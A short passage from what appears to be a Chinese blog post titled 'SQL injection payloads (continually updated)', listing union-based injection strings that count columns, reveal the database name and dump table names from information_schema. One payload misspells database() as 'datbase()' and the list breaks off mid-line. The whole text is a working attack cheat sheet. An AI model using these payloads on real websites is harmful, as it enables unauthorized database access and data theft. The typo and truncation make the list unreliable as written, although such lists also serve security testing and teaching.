SQL注入payload(持续更新)
id='1' order by 3 --+ //%20是空格,%23是#
id='2' and 1=2 union select 1,2,datbase()--+ //查数据库
id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表
id='4' and 1=2 union select 1,2,group_co
原创
2021-08-31 09:06:34 ·
2651 阅读 ·
0 评论